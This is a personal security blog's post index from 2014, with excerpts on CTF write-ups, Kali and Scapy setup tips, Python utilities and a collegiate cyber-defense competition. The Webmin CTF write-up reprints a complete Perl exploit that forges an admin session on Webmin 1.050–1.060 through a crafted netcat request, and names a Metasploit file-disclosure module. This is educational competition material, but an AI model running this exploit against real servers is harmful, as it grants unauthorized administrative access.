Posts

NCL Exploit 2: Webmin Writeup

Tue 30 September 2014

Category: Old Posts

This one was fun. The challenge was titled Exploit 2 with the task of finding the flag on the system. A quick nmap scan with service detection showed a Webmin console running on port 10000. I tried searching for a default password for default webmin login but it reads from shadow. I decided to look into webmin vulns next. A quick google search uncovered a remote command execution vuln! Hallelujah! I found the following exploit code.

#!/usr/bin/perl
#
# Exploit for Webmin 1.050 - 1.060 by Carl Livitt
#
# Inserts a fake session_id into the sessions list of webmin.
# Does no error checking... if remote host is not found, no
# error will be reported.
#

print "Webmin 1.050 - 1.060 Remote SID Injection Exploit\n";
print "By Carl Livitt \n\n";

$nc="/usr/bin/nc";

if($#ARGV == -1) {
    print "Syntax:\n\t$0 hostname\n";
    exit(1);
}

$hostname=$ARGV[0];

if ( ! -x $nc ) {
    print "netcat not found!\n";
    exit(2);
}

open(NC, "|$nc $hostname 10000 >& /dev/null");
print NC "GET / HTTP/1.1\n";
print NC "Host: $hostname\n";
print NC "User-agent: webmin\n";
print NC "Authorization: Basic YSBhIDEKbmV3IDEyMzQ1Njc4OTAgYWRtaW46cGFzc3dvcmQ=\n\n";
close(NC);

print "You should now have a session\_id of 1234567890 for user 'admin' on host $hostname.\n";
print "Just set two cookies in your browser:\n\ttesting=1\n\tsid=1234567890\nand you will ";
print "be authenticated to the webmin server!\n\n";
print "Note: This will only work on a webmin server configured with the 'passdelay' option.\n";

Escalating to admin looks good. Unfortunately, the exploit didn't seem to be working when I plugged the correct cookie values into Firefox. So I kept looking... Metasploit module for file disclosure: auxiliary/admin/webmin/file_disclosure ...

Check out the full post for more details!

Quickly Faking Services With Python
Tue 30 September 2014
Category: Old Posts

I was developing a port scanning exercise for RIT's Competitive Cybersecurity Club (RC3) a few weeks ago and I thought it would be neat to develop a tool to fake services on the fly. Out of this came fakesrv.py, which allows you to specify a protocol, port, and message or file to spit back when someone connects.
./fakesrv.py -t -p 1337 -m "This is a TCP server listening on port 1337!" ./fakesrv.py -u -p 12345 -m "This is a UDP server listening on port 12345!" ./fakesrv.py -t -p 31337 -f /etc/passwd
Quick, easy, and fun.
Check it out: https://github.com/jgeigerm/fakesrv
Running i386 Binaries on amd64 Debian
Thu 31 July 2014
Category: Old Posts

I ran into this recently and thought it was worth a post. During the Pwnium CTF I was trying to run some of the programs on my Kali VM/partition, which is an amd64 install. Unfortunately the binaries were for the i386 architecture. I did a quick search and all I could find was to run dpkg --add-architecture i386 and install ia32-libs.
. This doesn't play very nice with Kali and requires about 800MB of extra packages. Not so great. So I was searching around again today as I was upgrading Kali to 1.1.8 and found the better answer:
dpkg --add-architecture i386 apt-get update apt-get install libc6:i386
After I did that i386 programs would run. The best part, though: only 11MB. Big improvement, same result. Neat.
ref: http://stackoverflow.com/questions/20032019/to-install-ia32-libs-on-debian-wheezy-amd64
Scapy on Mac
Wed 16 July 2014
Category: Old Posts

Just a quick note here about an issue I was having getting Scapy to work with my Mac. It can be installed from MacPorts but you need to make sure the Python you are using is the MacPorts one in /opt/local/bin and not in /usr/bin. The Apple one has it's own issues and cannot see modules installed by macports. Alternatively you can just invoke Scapy from the command line by typing scapy into terminal.
Another issue I had was with bridged or vbox adapters. Scapy will throw the following error:
"/opt/local/Library/Frameworks/Python.framework/Versions/2.7/lib/python2.7/site-packages/scapy/arch/pcapdnet.py", line 168, in get_if_raw_addr return i.get(ifname)["addr"].data File "dnet.pyx", line 990, in dnet.intf.get OSError: Device not configured
The error has to do with getting details about interfaces on the computer. To fix edit /opt/local/Library/Frameworks/Python.framework/Versions/2.7/lib/python2.7/site-packages/scapy/arch/unix.py:
# from f=os.popen("netstat -rn") # -f inet
# to f=os.popen("netstat -rn | grep -v vboxnet | grep -v bridge") # -f inet
(/opt/local/Library/Frameworks/Python.framework/Versions/2.7/lib/python2.7/site-packages/scapy/arch/unix.py will change based on the version you are using, replace 2.7 and python 2.7 with your version) And that should fix everything! Happy hacking!
Quick and Dirty File Transfers with Python
Mon 07 July 2014
Category: Old Posts

If you ever need to transfer something quickly from one computer (that has Python) to another you can fire up the Python SimpleHTTPServer module to help you out. Simply change directories to the path you want to serve and run:
python -m SimpleHTTPServer 8080
This will serve the current directory via HTTP on port 8080. Download what you need on the other machine then control-C the python server to shut it down and that's it! The port can be changed from 8080 to any other port but keep in mind that if you want to serve on ports <1024 then you'll need to run the command as root. Neat!
Pwnium CTF - ROT Writeup
Sun 06 July 2014
Category: Old Posts

I wanted to do a writeup on SOMETHING from this CTF. So I picked the task I spent the most time on: ROT, a programming challenge worth 300 points.
The challenge said "nc 41.231.53.40 9090" and "ROT 90, ROT -90, ROT 90..." so as an obvious first step I connected to the server to see what I had to do.
nc 41.231.53.40 9090 iVBORw0KGgoAAAANSUhEUgAAAMgAAADICAIAAAAiOjnJAAATGUlEQVR4nO2de2wVx73HP2vjBHxsCNjXdrFDeCYqpFxCIA5VCSE... Answer:
About fifty lines of base64 encoded data and then an answer prompt. Okay so decode, solve for the flag, and submit it. No, not that simple! The connection to the server would close after about 3 seconds and each time that I connected the challenge base64 data changed. Whatever I had to program needed to work fast and provide the answer back. Since sockets are nice and simple in Python, it's what I chose to write this in. Alright, now time to figure out what that base64 is...
...
Check out the full post for more details!
Virtualizing a Physical (Kali) Linux Partition on Mac
Sun 08 June 2014
Category: Old Posts

Let me start by saying that I'm a fan of doing sort of obscure things. Things like installing Kali Linux onto a partition on my Mac so I could boot into it separately. So I did that with the help of a blog post at http://cr0ss.org/blog/?p=31. My drive is actually laid out as follows with disk0 being my internal SSD and disk0s1 representing partition 1, disk0s2 representing partition 2, etc.
My partition layout is a bit weird now and Disk Utility doesn't even read it right.
[disk0s1 - EFI Boot for OSX partition]
[disk0s2 - Solid, my OSX partition, ~350GB]
[disk0s3 - OSX Recovery Partition]
[disk0s6 - Kali, my Linux partition, ~47GB]
[disk0s4 - Linux (EFI) /boot partition]
[disk0s5 - Linux Swap space, ~2GB]
This is good to know moving forward. So I was happy with my Kali install and was booting into it fine but I was still missing a luxury I had when I was running Windows in Bootcamp: the ability to virtualize the physical partition. So I set out on a quest to solve this problem. First, I tried looking for what was already attempted before and I came across another blog post here that detailed how to get a physical linux partition booting in VMWare Fusion. My first attempts at this did not work because I only followed the first few steps and did not really understand the GRUB part because I had already installed GRUB. But not really... I had installed and configured GRUB on the physical /boot partition (disk0s4) so it wasn't on the main one (disk0s6) that I was actually mounting and trying to boot after creating the raw disk with the vmware-rawdiskCreator. So last night I tried again, this time booting from a live CD and installing grub from that. I figured that it would work now because it had a bootloader, but no such luck. When VMWare was trying to boot up the VM with the raw disk vmdk of my Kali partition it would try to unmount the entirety of disk0--the disk that contains the booted up host OS (OSX), so there was really no way it was getting unmounted.
...
Check out the full post for more details!
Compiling Redistributable DLL Independent in Visual Studio
Fri 06 June 2014
Category: Old Posts

I just was looking into this today and figured it was worth posting about. Usually code compiled with Visual Studio needs a redistributable package (ex. C++ Redistributables) to run. This is a set of DLLs that allows resulting executable to be smaller by having common function calls be distributed in the DLL rather than in the executable file itself. There is a way to turn this off though so your malware/program/whatever can stand on its own.
Project -> [Project Name] -> Properties
Configuration Properties -> C/C++ (or whatever language) -> Code Generation -> Runtime Library -> Set to Multi-Threaded (/MT)
It's as easy as that!
Simple Limited Backup Script
Sun 25 May 2014
Category: Old Posts

I was setting up cron tasks for updating and backing up this site today and wrote a very simple script to backup mysql and keep only the 10 most recent backups. Check it out:
#!/bin/bash date=<code>date +%m%d%Y-%H%M%S</code> cd $@ mysqldump --user=backupuser --password="mysqluserpassword" --all-databases --add-drop-table 2>/dev/null > mysql-backup-$date.sql ls -t \| tail -n +11 \| xargs rm &>/dev/null
This script dumps all databases and saves it as mysql-backup-$date.sql where $date is "MonthDayFullyear-HourMinSec" in a directory passed as an argument. Then it does an ls -t on the directory the backups are stored in (-t sorts ascending by date) then tail-ing lines 11 and up, ignoring the first 10. This is then fed to xargs rm to remove all but the 10 newest backups. I thought it was neat because it doesn't even require an if statement but still gets the job done. Obviously this can be used for other types of backups, too; just use the last line of this script after backing things up and you are good to go!
(the user backupuser only has read permissions on the DBs, so putting the password in this script isn't such a big deal)
RNCCDC
Sat 24 May 2014
Category: Old Posts

This year I had the honor of competing on the Collegiate Cyber Defense Competition (CCDC) team for RIT. For those of you unfamiliar with the CCDC it is the largest collegiate cyber security competition in the entire country. Over 180 schools competed in qualifying competitions, 10 from each of the 10 regions competed and the winner from each region had the chance to compete in the National CCDC for the Alamo Cup. The competition consists of three main teams: blue, red, and white. The blue teams are teams of eight students from a school that try to secure and defend systems they are given during the competition. The systems they are given have critical services to maintain such as email or DNS and also are bullet ridden with security flaws. At the same time they are also responsible for injects, or business tasks such as set up a VPN or central logging. The red team is a group of security professionals that try to hack into the blue teams' systems and disrupt their services. Blue teams are responsible for detecting and reporting red team activity in the form of incident response reports. The white team is the team that sets up the competition, designs the systems that are used in the competition, and monitor teams as they defend their networks and complete injects. Qualifying events are usually around 8 hours long, regionals are usually two or three days, and finally nationals consists of two days.
For the past couple of years RIT has won the North East Collegiate Cyber Defense Competition (NECCDC) and gone onto nationals. This year was no exception. I would go into more detail about that but this post is mainly focussed on nationals. Last year was the same, except the team won the national championship, so the team this year had quite a name to live up to.
Over the past few months I have gotten to know each and every one of my team members. They are honestly some of the smartest and most driven people I have ever met. We practiced and competed for months before the Raytheon National Collegiate Cyber Defense Competition (RNCCDC) of this year in San Antonio, Texas.
Our time practicing involved studying multiple OSs, securing them, learning to run services on them, detecting and stopping attacks, and preparing for the worst. Having heard all about the competition from members of the team that were there last year I was both nervous and excited.
We had no idea what we were in for...
...
Check out the full post for more details!